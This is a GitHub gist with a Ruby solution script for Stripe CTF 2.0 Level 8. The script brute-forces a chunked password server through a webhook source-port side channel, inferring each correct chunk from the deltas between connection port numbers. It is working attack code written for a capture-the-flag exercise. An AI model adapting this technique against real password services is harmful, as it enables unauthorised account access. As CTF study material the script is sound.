Skip to content

Instantly share code, notes, and snippets.

@bithive
Created August 12, 2014 18:50
Show Gist options
  • Save bithive/95f7d43cf0dc39c6b88c to your computer and use it in GitHub Desktop.
Save bithive/95f7d43cf0dc39c6b88c to your computer and use it in GitHub Desktop.
Stripe CTF 2.0 Level 8
require 'json'
require 'net/http'
require 'socket'
require 'uri'
# first argument is the url for the passworddb server
uri = URI.parse ARGV.shift
$passdb = Net::HTTP.new uri.host, uri.port
# second argument is the local port for our webhook
$port = ARGV.shift
$server = TCPServer.new $port
# a global variable representing the password in 4 chunks
$chunks = [0,0,0,0]
# makes an http request to the passworddb server
# returns true if the password is correct
def guess password
puts password
response = $passdb.post '/', {
password: password,
webhooks: [ "localhost:#{$port}" ]
}.to_json
response.body =~ /true/
end
# blocks and returns the next source port seen by the web hook
def notice_source_port
client = $server.accept
source_port = client.peeraddr[1]
client.close
source_port
end
# returns a string representation of the password
def stringify_password
$chunks.inject('') do |string, chunk|
string + chunk.to_s.rjust(3, '0')
end
end
# calibration step 1; need to establish baseline source port
guess stringify_password
first_port = notice_source_port
# calibration step 2; need to establish baseline delta
guess stringify_password
last_port = notice_source_port
last_delta = last_port - first_port
this_chunk = 0
verify = 3 # number of times to verify hits to prevent false positives
checks = verify
loop do
password = stringify_password
# make attempt
if guess password
puts "Yay! Password is #{password}"
break
end
# observe source port of webhook; calulate delta
source_port = notice_source_port
this_delta = source_port - last_port
last_port = source_port
if this_delta > last_delta
if this_delta - last_delta == 1
checks -= 1
redo if checks > 0
checks = verify
last_delta = this_delta
this_chunk += 1
end
else
$chunks[this_chunk] += 1
end
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment